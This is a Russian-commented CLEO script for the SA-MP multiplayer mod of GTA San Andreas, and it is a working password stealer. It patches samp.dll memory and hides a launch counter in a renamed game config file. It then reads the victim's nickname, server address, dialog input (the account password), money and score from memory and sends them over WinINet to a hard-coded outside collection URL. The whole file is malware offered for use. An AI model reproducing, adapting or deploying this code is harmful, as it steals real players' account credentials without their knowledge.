CLEO cs 0000 wait 1750 0AA2 31 load_library kernel32 dll IF and SET 0A

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
{$CLEO .cs}
0000:
wait 1750
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // Антикрашер
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0@ += 371500
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0@ += 9
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
var
30@: int
31@: int
end //"data/handling.cfg". handling.cfg это файл который лежит в папке data измените файл на любой другой существующий, так же можно заменить папку, можно дописать еще несколько папок. В этом файле будет храниться инфа о запусках игры
0af0: 30@ = "data/handling.cfg" "Setting" "Rand"
0af0: 31@ = "data/handling.cfg" "Setting" "Run"
0af1: 30@ "data/handling.cfg" "Setting" "Rand"
0af1: 31@ "data/handling.cfg" "Setting" "Run"
if or
30@ <= 0
31@ <= 0
31@ > 30@
then
0209: 30@ = random_int_in_ranges 2 2 //Рандом запуск, меньше чем 2 2 не ставить!
0af1: 30@ "data/handling.cfg" "Setting" "Rand"
0af1: 1 "data/handling.cfg" "Setting" "Run"
else
0af0: 30@ = "data/handling.cfg" "Setting" "Rand"
0af0: 31@ = "data/handling.cfg" "Setting" "Run"
31@ += 1
0af1: 31@ "data/handling.cfg" "Setting" "Run"
if 31@ > 30@
then
0209: 30@ = random_int_in_ranges 2 2 //Рандом запуск, меньше чем 2 2 не ставить!
0af1: 30@ "data/handling.cfg" "Setting" "Rand"
0af1: 1 "data/handling.cfg" "Setting" "Run"
end
end
if 31@ == 30@
then 0AB1: call_scm_func @Thread 1 @Stealer
end
//Тут начинается скрипт
0a93: //А тут заканчивается
:Stealer
0000:
While true
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 3@ = 0@ + 2173568 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
if 2@ > 1000
then
0A8E: 22@ = 2@ + 985 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
if 2@ > 1000
then
0A8E: 5@ = 23@ + 20 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
if 4@ > 1000
then
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
if 24@ > 1000
then
0A8E: 22@ = 0@ + 2173504 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
if 1@ > 1000
then
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
if 6@ == 1
then
if or
26@ == 1
26@ == 3
then
25@ = 1
end
end
if and
25@ == 1
not 6@ == 1
then
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 6@ = 0@ + 617008 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
if not 23@ >= 16
then
0085: 12@ = 7@ // (int)
else
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1
end
0A8E: 9@ = 2@ + 710 // int
0A8E: 14@ = 2@ + 452 // int
0A8E: 8@ = 2@ + 969 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
010B: 21@ = player $PLAYER_CHAR money
0AC6: 0@ = label @Base offset
0AC8: 20@ = allocate_memory_size 1024 //0 - base, 14 - ip, 15 - port, 9 - server, 12 - nick, 3 - dialog, 5 - pass, 21 - money, 27 - score
0AD3: 20@ = format "%snick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d&score=%d" 0@ 12@ 14@ 15@ 9@ 3@ 5@ 21@ 27@
0ac8: 8@ = 256
0ad3: 8@ = "Stealer" //Если ваша база умеет распознавать браузеры, то она решит, что жертва юзает браузер "Stealer"
0ab1: @InternetOpen 1 {USER_AGENT}8@ to {hSession} 9@ //Открытие сессии через наш "браузер"
0ab1: @InternetOpenUrl 2 {hSession} 9@ {Url} 20@ //Отсылка данных
0ac9: 8@
0006: 25@ = 0
end
end
end
end
end
end
end
:InternetOpen
0050: @wininet
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@
0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@
0ab2: 1 1@
:InternetOpenUrl
0050: @wininet
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@
0AA7: function 29@ params 6 pop 0 {parameters} 0 0 0 0 {URL} 1@ {handleInternet} 0@ {HANLDE} 2@
0ab2: 0
:wininet
0AA2: 30@ = load_library "Wininet.dll"
0051:
:Thread //Подключение 2го потока
0A9F: 32@ = current_thread_pointer
000A: 32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@ // (int)
000A: 33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 44
for 32@ = 0 to 30
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
end
0ab2: 0
:Base //аддрес базы
hex
"http:" 2f 2f "skrito.esy.es" 2f "santtos" 2f "add.php?" 00
end